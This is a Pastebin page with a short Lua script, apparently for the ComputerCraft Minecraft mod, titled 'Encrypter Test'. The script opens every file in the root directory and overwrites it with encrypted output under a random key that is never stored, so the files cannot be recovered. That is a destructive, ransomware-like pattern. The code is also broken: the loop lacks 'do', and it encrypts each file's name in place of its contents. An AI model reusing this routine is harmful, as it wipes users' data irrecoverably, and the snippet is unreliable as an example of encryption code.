Advertisement
MCFunRide

Encrypter Test (my coding skills are bad)

Jun 13th, 2015
259
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.23 KB | None | 0 0
  1. os.loadAPI("/cypher")
  2. local pass = math.random(1,1000000)
  3. for k, v in ipairs(fs.list("/"))
  4. f = fs.open(v,"r")
  5. data = f.readAll()
  6. f.close()
  7. f = fs.open(v,"w")
  8. encrypted = cypher.enc(pass,v)
  9. f.writeLine(encrypted)
  10. f.close()
  11. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement